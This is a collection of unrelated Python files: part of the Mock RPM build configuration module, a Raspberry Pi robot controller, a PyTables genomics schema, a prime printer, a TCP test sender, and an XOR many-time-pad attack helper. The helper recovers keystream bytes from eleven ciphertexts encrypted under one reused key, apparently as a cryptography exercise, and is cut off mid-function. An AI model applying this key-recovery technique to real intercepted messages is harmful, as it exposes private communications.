config_opts['state_log_fmt_name'] = "state"
config_opts['online'] = True
config_opts['use_nspawn'] = False
config_opts['rpmbuild_networking'] = False
config_opts['nspawn_args'] = []
config_opts['use_container_host_hostname'] = True
config_opts['internal_dev_setup'] = True
config_opts['internal_setarch'] = True
# cleanup_on_* only take effect for separate --resultdir
# config_opts provides fine-grained control. cmdline only has big hammer
config_opts['cleanup_on_success'] = True
config_opts['cleanup_on_failure'] = True
config_opts['exclude_from_homedir_cleanup'] = ['build/SOURCES', '.bash_history',
'.bashrc']
config_opts['createrepo_on_rpms'] = False
config_opts['createrepo_command'] = '/usr/bin/createrepo_c -d -q -x *.src.rpm' # default command
config_opts['backup_on_clean'] = False
config_opts['backup_base_dir'] = os.path.join(config_opts['basedir'], "backup")
# (global) plugins and plugin configs.
    # ordering constraints: tmpfs must be first.
# root_cache next.
# after that, any plugins that must create dirs (yum_cache)
# any plugins without preinit hooks should be last.
config_opts['plugins'] = PLUGIN_LIST
config_opts['plugin_dir'] = os.path.join(pkgpythondir, "plugins")
config_opts['plugin_conf'] = {
'ccache_enable': False,
'ccache_opts': {
'max_cache_size': "4G",
'compress': None,
'dir': "%(cache_topdir)s/%(root)s/ccache/u%(chrootuid)s/"},
'yum_cache_enable': True,
'yum_cache_opts': {
'max_age_days': 30,
'max_metadata_age_days': 30,
'dir': "%(cache_topdir)s/%(root)s/%(package_manager)s_cache/",
'target_dir': "/var/cache/%(package_manager)s/",
'online': True},
'root_cache_enable': True,
'root_cache_opts': {
'age_check': True,
'max_age_days': 15,
'dir': "%(cache_topdir)s/%(root)s/root_cache/",
'compress_program': 'pigz',
'exclude_dirs': ["./proc", "./sys", "./dev", "./tmp/ccache", "./var/cache/yum", "./var/cache/dnf"],
'extension': '.gz'},
'bind_mount_enable': True,
'bind_mount_opts': {
'dirs': [
# specify like this:
# ('/host/path', '/bind/mount/path/in/chroot/' ),
# ('/another/host/path', '/another/bind/mount/path/in/chroot/'),
],
'create_dirs': False},
'mount_enable': True,
'mount_opts': {'dirs': [
# specify like this:
# ("/dev/device", "/mount/path/in/chroot/", "vfstype", "mount_options"),
]},
'tmpfs_enable': False,
'tmpfs_opts': {
'required_ram_mb': 900,
'max_fs_size': None,
'mode': '0755',
'keep_mounted': False},
'selinux_enable': True,
'selinux_opts': {},
'package_state_enable': False,
'package_state_opts': {
'available_pkgs': False,
'installed_pkgs': True,
},
'pm_request_enable': False,
'pm_request_opts': {},
'lvm_root_enable': False,
'lvm_root_opts': {
'pool_name': 'mockbuild',
},
'chroot_scan_enable': False,
'chroot_scan_opts': {
'regexes': [
"^[^k]?core(\\.\\d+)?$", "\\.log$",
],
'only_failed': True},
'sign_enable': False,
'sign_opts': {
'cmd': 'rpmsign',
'opts': '--addsign %(rpms)s',
},
'hw_info_enable': True,
'hw_info_opts': {
},
}
config_opts['environment'] = {
'TERM': 'vt100',
'SHELL': '/bin/bash',
'HOME': '/builddir',
'HOSTNAME': 'mock',
'PATH': '/usr/bin:/bin:/usr/sbin:/sbin',
'PROMPT_COMMAND': r'printf "\033]0;<mock-chroot>\007"',
'PS1': r'<mock-chroot> \s-\v\$ ',
'LANG': os.environ.setdefault('LANG', 'en_US.UTF-8'),
}
runtime_plugins = [runtime_plugin
for (runtime_plugin, _)
in [os.path.splitext(os.path.basename(tmp_path))
for tmp_path
in glob(config_opts['plugin_dir'] + "/*.py")]
if runtime_plugin not in config_opts['plugins']]
for runtime_plugin in sorted(runtime_plugins):
config_opts['plugins'].append(runtime_plugin)
config_opts['plugin_conf'][runtime_plugin + "_enable"] = False
config_opts['plugin_conf'][runtime_plugin + "_opts"] = {}
# SCM defaults
config_opts['scm'] = False
config_opts['scm_opts'] = {
'method': 'git',
'cvs_get': 'cvs -d /srv/cvs co SCM_BRN SCM_PKG',
'git_get': 'git clone SCM_BRN git://localhost/SCM_PKG.git SCM_PKG',
'svn_get': 'svn co file:///srv/svn/SCM_PKG/SCM_BRN SCM_PKG',
'distgit_get': 'rpkg clone -a --branch SCM_BRN SCM_PKG SCM_PKG',
'distgit_src_get': 'rpkg sources',
'spec': 'SCM_PKG.spec',
'ext_src_dir': os.devnull,
'write_tar': False,
'git_timestamps': False,
'exclude_vcs': True,
}
# dependent on guest OS
config_opts['useradd'] = \
'/usr/sbin/useradd -o -m -u %(uid)s -g %(gid)s -d %(home)s -n %(user)s'
config_opts['use_host_resolv'] = True
config_opts['chroot_setup_cmd'] = ('groupinstall', 'buildsys-build')
config_opts['target_arch'] = 'i386'
config_opts['releasever'] = None
config_opts['rpmbuild_arch'] = None # <-- None means set automatically from target_arch
config_opts['yum.conf'] = ''
config_opts['yum_builddep_opts'] = []
config_opts['yum_common_opts'] = []
config_opts['update_before_build'] = True
config_opts['priorities.conf'] = '\n[main]\nenabled=0'
config_opts['rhnplugin.conf'] = '\n[main]\nenabled=0'
config_opts['subscription-manager.conf'] = ''
config_opts['more_buildreqs'] = {}
config_opts['nosync'] = False
config_opts['nosync_force'] = False
config_opts['files'] = {}
config_opts['macros'] = {
'%_topdir': '%s/build' % config_opts['chroothome'],
'%_rpmfilename': '%%{NAME}-%%{VERSION}-%%{RELEASE}.%%{ARCH}.rpm',
}
config_opts['hostname'] = None
# security config
config_opts['no_root_shells'] = False
config_opts['extra_chroot_dirs'] = []
config_opts['package_manager'] = 'yum'
# configurable commands executables
config_opts['yum_command'] = '/usr/bin/yum'
if os.path.isfile('/usr/bin/yum-deprecated'):
config_opts['yum_command'] = '/usr/bin/yum-deprecated'
config_opts['yum_builddep_command'] = '/usr/bin/yum-builddep'
config_opts['dnf_command'] = '/usr/bin/dnf'
config_opts['rpm_command'] = '/bin/rpm'
config_opts['rpmbuild_command'] = '/usr/bin/rpmbuild'
return config_opts
@traceLog()
def set_config_opts_per_cmdline(config_opts, options, args):
"takes processed cmdline args and sets config options."
config_opts['verbose'] = options.verbose
config_opts['print_main_output'] = config_opts['verbose'] > 0 and sys.stderr.isatty()
# do some other options and stuff
if options.arch:
config_opts['target_arch'] = options.arch
if options.rpmbuild_arch:
config_opts['rpmbuild_arch'] = options.rpmbuild_arch
elif config_opts['rpmbuild_arch'] is None:
config_opts['rpmbuild_arch'] = config_opts['target_arch']
if not options.clean:
config_opts['clean'] = options.clean
if not options.check:
config_opts['check'] = options.check
if options.post_install:
config_opts['post_install'] = options.post_install
for option in options.rpmwith:
options.rpmmacros.append("_with_%s --with-%s" %
(option.replace("-", "_"), option))
for option in options.rpmwithout:
options.rpmmacros.append("_without_%s --without-%s" %
(option.replace("-", "_"), option))
for macro in options.rpmmacros:
try:
macro = macro.strip()
k, v = macro.split(" ", 1)
if not k.startswith('%'):
k = '%%%s' % k
config_opts['macros'].update({k: v})
except:
raise exception.BadCmdline(
"Bad option for '--define' (%s). Use --define 'macro expr'"
% macro)
if options.macrofile:
config_opts['macrofile'] = os.path.expanduser(options.macrofile)
if not os.path.isfile(config_opts['macrofile']):
raise exception.BadCmdline(
"Input rpm macros file does not exist: %s"
% options.macrofile)
if options.resultdir:
config_opts['resultdir'] = os.path.expanduser(options.resultdir)
if options.rootdir:
config_opts['rootdir'] = os.path.expanduser(options.rootdir)
if options.uniqueext:
config_opts['unique-ext'] = options.uniqueext
if options.rpmbuild_timeout is not None:
config_opts['rpmbuild_timeout'] = options.rpmbuild_timeout
for i in options.disabled_plugins:
if i not in config_opts['plugins']:
raise exception.BadCmdline(
"Bad option for '--disable-plugin=%s'. Expecting one of: %s"
% (i, config_opts['plugins']))
config_opts['plugin_conf']['%s_enable' % i] = False
for i in options.enabled_plugins:
if i not in config_opts['plugins']:
raise exception.BadCmdline(
"Bad option for '--enable-plugin=%s'. Expecting one of: %s"
% (i, config_opts['plugins']))
config_opts['plugin_conf']['%s_enable' % i] = True
for option in options.plugin_opts:
try:
p, kv = option.split(":", 1)
k, v = kv.split("=", 1)
except:
raise exception.BadCmdline(
"Bad option for '--plugin-option' (%s). Use --plugin-option 'plugin:key=value'"
% option)
if p not in config_opts['plugins']:
raise exception.BadCmdline(
"Bad option for '--plugin-option' (%s). No such plugin: %s"
% (option, p))
try:
v = literal_eval(v)
except:
pass
config_opts['plugin_conf'][p + "_opts"].update({k: v})
global USE_NSPAWN
USE_NSPAWN = config_opts['use_nspawn']
if options.old_chroot:
USE_NSPAWN = False
if options.new_chroot:
USE_NSPAWN = True
if options.mode in ("rebuild",) and len(args) > 1 and not options.resultdir:
raise exception.BadCmdline(
"Must specify --resultdir when building multiple RPMS.")
if options.cleanup_after is False:
config_opts['cleanup_on_success'] = False
config_opts['cleanup_on_failure'] = False
if options.cleanup_after is True:
config_opts['cleanup_on_success'] = True
config_opts['cleanup_on_failure'] = True
check_config(config_opts)
# can't cleanup unless resultdir is separate from the root dir
rootdir = os.path.join(config_opts['basedir'], config_opts['root'])
if is_in_dir(config_opts['resultdir'] % config_opts, rootdir):
config_opts['cleanup_on_success'] = False
config_opts['cleanup_on_failure'] = False
config_opts['cache_alterations'] = options.cache_alterations
config_opts['online'] = options.online
if options.pkg_manager:
config_opts['package_manager'] = options.pkg_manager
if options.mode == 'yum-cmd':
config_opts['package_manager'] = 'yum'
if options.mode == 'dnf-cmd':
config_opts['package_manager'] = 'dnf'
if options.short_circuit:
config_opts['short_circuit'] = options.short_circuit
config_opts['clean'] = False
if options.rpmbuild_opts:
config_opts['rpmbuild_opts'] = options.rpmbuild_opts
config_opts['enable_disable_repos'] = options.enable_disable_repos
if options.scm:
try:
# pylint: disable=unused-variable
from . import scm
except ImportError as e:
raise exception.BadCmdline(
"Mock SCM module not installed: %s" % e)
config_opts['scm'] = options.scm
for option in options.scm_opts:
try:
k, v = option.split("=", 1)
config_opts['scm_opts'].update({k: v})
except:
raise exception.BadCmdline(
"Bad option for '--scm-option' (%s). Use --scm-option 'key=value'"
% option)
def check_config(config_opts):
if 'root' not in config_opts:
raise exception.ConfigError("Error in configuration "
"- option config_opts['root'] must be present in your config.")
@traceLog()
def include(config_file, config_opts, is_statement=False):
if os.path.exists(config_file):
if is_statement and config_file in config_opts['config_paths']:
getLog().warning("Multiple inclusion of %s, skipping" % config_file)
return
config_opts['config_paths'].append(config_file)
with open(config_file) as f:
content = f.read()
content = re.sub(r'include\((.*)\)', r'include(\g<1>, config_opts, True)', content)
code = compile(content, config_file, 'exec')
exec(code)
else:
raise exception.ConfigError("Could not find included config file: %s" % config_file)
@traceLog()
def update_config_from_file(config_opts, config_file, uid_manager):
config_file = os.path.realpath(config_file)
r_pipe, w_pipe = os.pipe()
if os.fork() == 0:
try:
os.close(r_pipe)
if uid_manager and not all(getresuid()):
uid_manager.dropPrivsForever()
include(config_file, config_opts)
with os.fdopen(w_pipe, 'wb') as writer:
pickle.dump(config_opts, writer)
except:
import traceback
etype, evalue, raw_tb = sys.exc_info()
tb = traceback.extract_tb(raw_tb)
tb = [entry for entry in tb if entry[0] == config_file]
print('\n'.join(traceback.format_list(tb)), file=sys.stderr)
print('\n'.join(traceback.format_exception_only(etype, evalue)),
file=sys.stderr)
sys.exit(1)
sys.exit(0)
else:
os.close(w_pipe)
with os.fdopen(r_pipe, 'rb') as reader:
while True:
try:
new_config = reader.read()
break
except OSError as e:
if e.errno != errno.EINTR:
raise
_, ret = os.wait()
if ret != 0:
raise exception.ConfigError('Error in configuration')
if new_config:
config_opts.update(pickle.loads(new_config))
@traceLog()
def do_update_config(log, config_opts, cfg, uidManager, name, skipError=True):
if os.path.exists(cfg):
config_opts['config_paths'].append(cfg)
update_config_from_file(config_opts, cfg, uidManager)
check_macro_definition(config_opts)
elif not skipError:
log.error("Could not find required config file: %s", cfg)
if name == "default":
log.error(" Did you forget to specify the chroot to use with '-r'?")
if "/" in cfg:
log.error(" If you're trying to specify a path, include the .cfg extension, e.g. -r ./target.cfg")
sys.exit(1)
@traceLog()
def load_config(config_path, name, uidManager, version, pkg_python_dir):
log = logging.getLogger()
if uidManager:
gid = uidManager.unprivUid
else:
gid = os.getuid()
config_opts = setup_default_config_opts(gid, version, pkg_python_dir)
# array to save config paths
config_opts['config_paths'] = []
config_opts['chroot_name'] = name
# Read in the config files: default, and then user specified
if name.endswith('.cfg'):
# If the .cfg is explicitly specified we take the root arg to
# specify a path, rather than looking it up in the configdir.
chroot_cfg_path = name
config_opts['chroot_name'] = os.path.splitext(os.path.basename(name))[0]
else:
chroot_cfg_path = '%s/%s.cfg' % (config_path, name)
config_opts['config_file'] = chroot_cfg_path
cfg = os.path.join(config_path, 'site-defaults.cfg')
do_update_config(log, config_opts, cfg, uidManager, name)
do_update_config(log, config_opts, chroot_cfg_path, uidManager, name, skipError=False)
# Read user specific config file
cfg = os.path.join(os.path.expanduser(
'~' + pwd.getpwuid(os.getuid())[0]), '.mock/user.cfg')
do_update_config(log, config_opts, cfg, uidManager, name)
cfg = os.path.join(os.path.expanduser(
'~' + pwd.getpwuid(os.getuid())[0]), '.config/mock.cfg')
do_update_config(log, config_opts, cfg, uidManager, name)
# default /etc/hosts contents
if not config_opts['use_host_resolv'] and 'etc/hosts' not in config_opts['files']:
config_opts['files']['etc/hosts'] = dedent('''\
127.0.0.1 localhost localhost.localdomain
::1 localhost localhost.localdomain localhost6 localhost6.localdomain6
''')
if config_opts['use_container_host_hostname'] and '%_buildhost' not in config_opts['macros']:
config_opts['macros']['%_buildhost'] = socket.getfqdn()
return config_opts
@traceLog()
def check_macro_definition(config_opts):
    for k, v in list(config_opts['macros'].items()):  # copy: the dict may be mutated below
if not k or (not v and (v is not None)) or len(k.split()) != 1:
raise exception.BadCmdline(
"Bad macros 'config_opts['macros']['%s'] = ['%s']'" % (k, v))
if not k.startswith('%'):
del config_opts['macros'][k]
k = '%{0}'.format(k)
config_opts['macros'].update({k: v})
@traceLog()
def pretty_getcwd():
try:
return os.getcwd()
except OSError:
if ORIGINAL_CWD is not None:
return ORIGINAL_CWD
else:
return find_non_nfs_dir()
ORIGINAL_CWD = None
ORIGINAL_CWD = pretty_getcwd()
@traceLog()
def find_btrfs_in_chroot(mockdir, chroot_path):
"""
Find a btrfs subvolume inside the chroot.
Example btrfs output:
ID 258 gen 32689 top level 5 path root
ID 493 gen 32682 top level 258 path var/lib/mock/fedora-rawhide-x86_64/root/var/lib/machines
The subvolume's path will always be the 9th field of the output and
    will not contain a leading '/'. The output also contains an additional
newline at the end, which should not be parsed.
"""
try:
output = do(["btrfs", "subv", "list", mockdir], returnOutput=1, printOutput=False)
except OSError as e:
# btrfs utility does not exist, nothing we can do about it
if e.errno == errno.ENOENT:
return None
raise e
except Exception as e:
# it is not btrfs volume
log = getLog()
log.debug("Please ignore the error above above about btrfs.")
return None
for l in output[:-1].splitlines():
subv = l.split()[8]
if subv.startswith(chroot_path[1:]):
return subv
|
import RPi.GPIO as GPIO
import time
import sys, tty, termios
print '\nHi, I am PiBot, your very own learning robot.'
print 'My controls are "w"=forward; "s"=reverse; "a"=left; "d"=right and "q"=quit.'
print 'I hope you have lots of fun...'
GPIO.setmode(GPIO.BOARD)
GPIO.setup(7, GPIO.OUT)
GPIO.setup(11, GPIO.OUT)
GPIO.setup(13, GPIO.OUT)
GPIO.setup(15, GPIO.OUT)
def getch():
fd = sys.stdin.fileno()
old_settings = termios.tcgetattr(fd)
try:
tty.setraw(sys.stdin.fileno())
ch = sys.stdin.read(1)
finally:
termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
return ch
RUNNING = True
try:
while RUNNING:
# Keyboard character retrieval method is called and saved
# into variable
char = getch()
if(char == "q"):
RUNNING = False
#print "\nPiBot is going offline."
break
# The car will drive forward when the "w" key is pressed
if(char == "w"):
print 'forward'
GPIO.output(11, True)
GPIO.output(13, True)
time.sleep(1)
GPIO.output(11, False)
GPIO.output(13, False)
# The car will reverse when the "s" key is pressed
if(char == "s"):
print 'back'
GPIO.output(7, True)
GPIO.output(15, True)
time.sleep(1)
GPIO.output(7, False)
GPIO.output(15, False)
# The car will drive left when the "a" key is pressed
if(char == "a"):
print 'left'
GPIO.output(13, True)
time.sleep(1)
GPIO.output(13, False)
# The car will drive right when the "d" key is pressed
if(char == "d"):
print 'right'
GPIO.output(11, True)
time.sleep(1)
GPIO.output(11, False)
# The keyboard character variable will be set to blank, ready
# to save the next key that is pressed
char = ""
except KeyboardInterrupt:
RUNNING = False
print "\nQuitting robot"
finally:
# Stop and cleanup to finish cleanly so the pins
# are available to be used again
GPIO.cleanup()
print "\nPiBot is going offline..."
|
from tables import *
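# Convenience monkeypatch: allow dict-style child access on any PyTables Node,
# e.g. h5file.root['maps']['main'] (delegates to the _f_get_child accessor).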
Node.__getitem__ = lambda self, key : self._f_get_child(key)
def encodeChrName(name):
if name[0:3].lower() == "chr":
name = name[3:]
if name.isdigit():
enc = int(name)
assert enc < 1000000 # not to interfere with contig encodings
return enc
elif name.startswith('C') and name[1:].isdigit():
# contig e.g. C99999
return int(name[1:]) + 1000000
else:
enc = sum(ord(c) * 256**x for c, x in zip(name, range(len(name))))
assert enc < 2**32, (name, enc) # needs to fit in a 32 bit signed long
return -enc # return neg value
def decodeChrName(number):
if number < 0:
x = -number
decoded = ''
while x:
decoded += chr(x % 256)
            x //= 256  # floor division keeps this correct on Python 3 as well
return 'chr{}'.format(decoded)
elif number > 1000000:
# contig
return 'C{}'.format(number - 1000000)
else:
# chromosome
return 'chr{}'.format(number)
class MainChunkMap(IsDescription): # maps.main
colId = Int64Col(pos=1) # key
alignmentNumber = Int32Col(pos=2) # alignment nr (encoded chr nr)
chunk = UInt32Col(pos=3) # chunk nr
    segment = UInt32Col(pos=4) # maf nr in chunk (for tracking the chunking procedure)
score = Float64Col(pos=5) # maf alignment score
begin = Int64Col(pos=6) # alignment coord
end = Int64Col(pos=7) # alignment coord
class SpeciesChunkMap(IsDescription): # maps.<speciesname>
colId = Int64Col(pos=1) # key
chromosome = Int32Col(pos=2) # species chromosome
    strand = Int8Col(pos=3) # etc.
begin = Int64Col(pos=4)
end = Int64Col(pos=5)
srcLength = Int64Col(pos=6)
class SpeciesCoordinates(IsDescription): # coords.<speciesname> (single pos coordinates, mapping between alignment and species coordinates)
chromosome = Int32Col(pos=1)
strand = Int8Col(pos=2)
SpeciesPositionOnPlusStrand = Int64Col(pos=3)
alignmentNumber = Int32Col(pos=4)
alignmentPosition = Int64Col(pos=5)
class SpeciesIntervalCoordinates(IsDescription): # coords.<speciesname> same as above but for intervals
chromosome = Int32Col(pos=1)
strand = Int8Col(pos=2)
alignmentNumber = Int32Col(pos=3)
SpeciesPositionOnPlusStrandBegin = Int64Col(pos=4)
SpeciesPositionOnPlusStrandEnd = Int64Col(pos=5)
alignmentPositionBegin = Int64Col(pos=6)
alignmentPositionEnd = Int64Col(pos=7)
class Posteriors(IsDescription): # posteriors.<speciesname>
V0 = Float64Col(pos=1) # state 0
V1 = Float64Col(pos=2) # etc...
V2 = Float64Col(pos=3)
V3 = Float64Col(pos=4)
maxstate = UInt16Col(pos=5) # state max prob
maxP = Float64Col(pos=6) # map prob
chunk = UInt32Col(pos=7) # chunk this originates from
alignmentPosition = Int64Col(pos=8) # (alignment pos)
alignmentNumber = Int32Col(pos=9) # alignment nr
speciesPosition = Int64Col(pos=10) # mapped species position
class Lists(IsDescription):
listNumber = UInt32Col(pos=1)
listIndex = UInt32Col(pos=2)
alignmentNumber = Int32Col(pos=3)
chunk = UInt32Col(pos=4)
alignmentPositionBegin = Int64Col(pos=5)
alignmentPositionEnd = Int64Col(pos=6)
class Segments(IsDescription):
AlignmentPositionFrom = Int64Col(pos=1)
AlignmentPositionTo = Int64Col(pos=2)
SpeciesPositionFrom = Int64Col(pos=3)
SpeciesPositionTo = Int64Col(pos=4)
State = Int8Col(pos=5)
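# Illustrative round-trip check (an addition for clarity, not part of the
# original schema module): the two name codecs above should invert each other
# for chromosomes, contigs and arbitrary sequence names.
if __name__ == '__main__':
    assert decodeChrName(encodeChrName('chr7')) == 'chr7'
    assert decodeChrName(encodeChrName('C99999')) == 'C99999'
    assert decodeChrName(encodeChrName('chrUn')) == 'chrUn'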
|
__author__ = 'maln'
def isprime(n):
    if n < 2:
        return False
    for x in range(2, n):
        if n % x == 0:
            return False
    # prime only if no divisor was found in the whole range
    return True
i = 1
count_of_prime = 0
while count_of_prime < 10000:
if isprime(i):
print i
count_of_prime += 1
i += 1
|
import socket
import sys
import getopt
import marshal
import random
from time import sleep
sourceAddr = "0.0.0.0"
sourcePort = random.randint(60000, 65400) # Select random source port
packetLength = 32 # Number of bytes
packetBody = "\x00" * packetLength
socketFlagNum = 100 # SO_CROSS_LAYER_DELAY
sleepDuration = 2 # Seconds
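# Example invocation (hypothetical host, port and script name):
#   python sender.py -a 192.0.2.10 -p 5001 -n 100 -d 50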
def main(argv):
destAddr = -1
destPort = -1
numPacketsToSend = 0
delayToleranceInMs = 0
# Parse argument list
try:
opts, args = getopt.getopt(argv[1:], "ha:p:n:d:", ["addr=", "port=", "npack=", "delay="])
except getopt.GetoptError:
print(argv[0] + ' -a <dest_addr> -p <dest_port> -n <num_packets> -d <delay_tolerance_ms>')
sys.exit(2)
# Read arguments
for opt, arg in opts:
if opt == '-h':
            print(argv[0] + ' -a <dest_addr> -p <dest_port> -n <num_packets> -d <delay_tolerance_ms>')
sys.exit()
elif opt in ("-a", "--addr"):
destAddr = str(arg)
elif opt in ("-p", "--port"):
destPort = int(arg)
elif opt in ("-n", "--npack"):
numPacketsToSend = int(arg)
elif opt in ("-d", "--delay"):
delayToleranceInMs = int(arg)
if destAddr == -1 or destPort == -1:
print("Usage: " + argv[0] + '-a <dest_addr> -p <dest_port>')
sys.exit(1)
# Start transfer
transfer(destAddr, destPort, numPacketsToSend, delayToleranceInMs)
def transfer(destAddr, destPort, numPacketsToSend, delayToleranceInMs):
yes = 1
# Create socket and connect
fd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
fd.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, yes)
fd.bind((sourceAddr, sourcePort)) # select source port to reduce nondeterminism
if delayToleranceInMs != 0:
print("Delay set to " + str(delayToleranceInMs) + " ms.")
fd.setsockopt(socket.SOL_SOCKET, socketFlagNum, delayToleranceInMs)
fd.connect((destAddr, destPort))
print("Transfer will begin in " + str(sleepDuration) + " seconds")
# Sleep for 'sleepDuration' seconds before starting
# sleep(sleepDuration)
# keep sending
while True:
# send a marshaled "size" header field
fd.send(marshal.dumps(packetLength * numPacketsToSend))
# Start the transfer
for x in range(int(numPacketsToSend)):
fd.send(packetBody.encode())
# exactly the size of ack msg
data = fd.recv(3)
print("Transfer complete, sent " + str(numPacketsToSend) + " packets.")
fd.close()
if __name__ == "__main__":
main(sys.argv)
|
import sys
import operator
import os
import string
class XorAttack(object):
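    """Interactive helper for the many-time-pad attack: every message was
    encrypted with the same keystream, so each ciphertext column can be
    tested byte-by-byte against all messages for printable plaintext."""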
def __init__(self):
self.exit = False
self.column = 0
self.maxCols = 0
def load(self):
self.messages = [
"315c4eeaa8b5f8aaf9174145bf43e1784b8fa00dc71d885a804e5ee9fa40b16349c146fb778cdf2d3aff021dfff5b403b510d0d0455468aeb98622b137dae857553ccd8883a7bc37520e06e515d22c954eba5025b8cc57ee59418ce7dc6bc41556bdb36bbca3e8774301fbcaa3b83b220809560987815f65286764703de0f3d524400a19b159610b11ef3e",
"234c02ecbbfbafa3ed18510abd11fa724fcda2018a1a8342cf064bbde548b12b07df44ba7191d9606ef4081ffde5ad46a5069d9f7f543bedb9c861bf29c7e205132eda9382b0bc2c5c4b45f919cf3a9f1cb74151f6d551f4480c82b2cb24cc5b028aa76eb7b4ab24171ab3cdadb8356f",
"32510ba9a7b2bba9b8005d43a304b5714cc0bb0c8a34884dd91304b8ad40b62b07df44ba6e9d8a2368e51d04e0e7b207b70b9b8261112bacb6c866a232dfe257527dc29398f5f3251a0d47e503c66e935de81230b59b7afb5f41afa8d661cb",
"32510ba9aab2a8a4fd06414fb517b5605cc0aa0dc91a8908c2064ba8ad5ea06a029056f47a8ad3306ef5021eafe1ac01a81197847a5c68a1b78769a37bc8f4575432c198ccb4ef63590256e305cd3a9544ee4160ead45aef520489e7da7d835402bca670bda8eb775200b8dabbba246b130f040d8ec6447e2c767f3d30ed81ea2e4c1404e1315a1010e7229be6636aaa",
"3f561ba9adb4b6ebec54424ba317b564418fac0dd35f8c08d31a1fe9e24fe56808c213f17c81d9607cee021dafe1e001b21ade877a5e68bea88d61b93ac5ee0d562e8e9582f5ef375f0a4ae20ed86e935de81230b59b73fb4302cd95d770c65b40aaa065f2a5e33a5a0bb5dcaba43722130f042f8ec85b7c2070",
"32510bfbacfbb9befd54415da243e1695ecabd58c519cd4bd2061bbde24eb76a19d84aba34d8de287be84d07e7e9a30ee714979c7e1123a8bd9822a33ecaf512472e8e8f8db3f9635c1949e640c621854eba0d79eccf52ff111284b4cc61d11902aebc66f2b2e436434eacc0aba938220b084800c2ca4e693522643573b2c4ce35050b0cf774201f0fe52ac9f26d71b6cf61a711cc229f77ace7aa88a2f19983122b11be87a59c355d25f8e4",
"32510bfbacfbb9befd54415da243e1695ecabd58c519cd4bd90f1fa6ea5ba47b01c909ba7696cf606ef40c04afe1ac0aa8148dd066592ded9f8774b529c7ea125d298e8883f5e9305f4b44f915cb2bd05af51373fd9b4af511039fa2d96f83414aaaf261bda2e97b170fb5cce2a53e675c154c0d9681596934777e2275b381ce2e40582afe67650b13e72287ff2270abcf73bb028932836fbdecfecee0a3b894473c1bbeb6b4913a536ce4f9b13f1efff71ea313c8661dd9a4ce",
"315c4eeaa8b5f8bffd11155ea506b56041c6a00c8a08854dd21a4bbde54ce56801d943ba708b8a3574f40c00fff9e00fa1439fd0654327a3bfc860b92f89ee04132ecb9298f5fd2d5e4b45e40ecc3b9d59e9417df7c95bba410e9aa2ca24c5474da2f276baa3ac325918b2daada43d6712150441c2e04f6565517f317da9d3",
"271946f9bbb2aeadec111841a81abc300ecaa01bd8069d5cc91005e9fe4aad6e04d513e96d99de2569bc5e50eeeca709b50a8a987f4264edb6896fb537d0a716132ddc938fb0f836480e06ed0fcd6e9759f40462f9cf57f4564186a2c1778f1543efa270bda5e933421cbe88a4a52222190f471e9bd15f652b653b7071aec59a2705081ffe72651d08f822c9ed6d76e48b63ab15d0208573a7eef027",
"466d06ece998b7a2fb1d464fed2ced7641ddaa3cc31c9941cf110abbf409ed39598005b3399ccfafb61d0315fca0a314be138a9f32503bedac8067f03adbf3575c3b8edc9ba7f537530541ab0f9f3cd04ff50d66f1d559ba520e89a2cb2a83",
"32510ba9babebbbefd001547a810e67149caee11d945cd7fc81a05e9f85aac650e9052ba6a8cd8257bf14d13e6f0a803b54fde9e77472dbff89d71b57bddef121336cb85ccb8f3315f4b52e301d16e9f52f904"
]
self.maxCols = 0
self.keys=[]
for msg in self.messages:
if len(msg) > self.maxCols:
self.maxCols = len(msg)
for i in range(0,self.maxCols -1):
self.keys.append('00')
def accept(self):
command = raw_input('?: ')
try:
if command == 'q':
self.exit = True
elif command[0:4] == 'col ':
self.column = int(command[4:])
elif command[0:4] == 'set ':
self.keys[self.column] = command[4:]
elif command[0:4] == 'keys':
self.showKeys(command[5:])
elif command[0:1] == 's':
self.showColumn()
elif command[0:5] == 'range':
self.showRange(command[6:])
elif command[0:4] == 'auto':
self.autoDiscover()
elif command[0:8] == 'discover':
self.discover()
elif command[0:4] == 'test':
self.test()
elif command[0:4] == 'get ':
self.getFrom(command[4:5],command[6:8])
else:
print
print "Unknown command"
print " q -> quit"
print " col # -> select column"
print " set # -> use key"
print " s -> show current column"
print " keys [#] -> show keys"
print " range [#] -> show range"
print " auto -> autodiscover"
print
except:
self.showKeys(100)
def getFrom(self, asciiClear, hexCipher):
print self.strxor(asciiClear,hexCipher.decode('hex')).encode('hex')
def test(self):
for i in range(0,255):
if chr(i) in string.printable:
print format("i: %d c: %s" % (i,chr(i)))
def isPrintable(self,c):
return c in string.printable and ord(c) >= 32
def isStrictPrintable(self,c):
return c == ' ' or c in string.digits or c in string.letters
def autoDiscover(self,cols=0):
cols = self.fixCols(cols)
#self.showRuler(cols)
for idx in range(0,self.maxCols -1):
sys.stdout.write("Discovering %d ..." % idx)
self.column = idx #setter
letters = self.discoverLetters()
if len(letters) == 1:
self.keys[idx]=letters[0].encode('hex')
print self.keys[idx]
continue
letters = self.discoverStrictPrintable()
if len(letters) != 0:
self.keys[idx]=letters[0].encode('hex')
print "fallback " + self.keys[idx]
continue
continue
def discoverPrintable(self):
result=[]
for i in range(0,255):
asciiKey = chr(i)
candidate = True
for msg in self.messages:
clearAscii = self.strxor(asciiKey, msg[self.column * 2:(self.column *2)+ 2].decode('hex') )
if not self.isPrintable(clearAscii):
candidate = False
break
if candidate:
result.append(asciiKey)
return result
def discoverStrictPrintable(self):
result=[]
for i in range(0,255):
asciiKey = chr(i)
candidate = True
for msg in self.messages:
clearAscii = self.strxor(asciiKey, msg[self.column * 2 :( self.column * 2)+ 2].decode('hex') )
if not self.isStrictPrintable(clearAscii):
candidate = False
break
if candidate:
result.append(asciiKey)
return result
def discoverLetters(self):
result=[]
for i in range(0,255):
asciiKey = chr(i)
candidate = True
for msg in self.messages:
clearAscii = self.strxor(asciiKey, msg[self.column * 2 :( self.column * 2)+ 2].decode('hex') )
if clearAscii != ' ' and clearAscii not in string.letters:
candidate = False
break
if candidate:
result.append(asciiKey)
return result
def discover(self):
sys.stdout.write('printable: ')
for asciiKey in self.discoverPrintable():
sys.stdout.write(format('%s ' % asciiKey.encode('hex') ))
print
sys.stdout.write('strict : ')
for asciiKey in self.discoverStrictPrintable():
sys.stdout.write(format('%s ' % asciiKey.encode('hex') ))
print
sys.stdout.write('letters : ')
for asciiKey in self.discoverLetters():
sys.stdout.write(format('%s ' % asciiKey.encode('hex') ))
print
    def strxor(self, a, b):  # xor two strings, truncating to the shorter length
if len(a) > len(b):
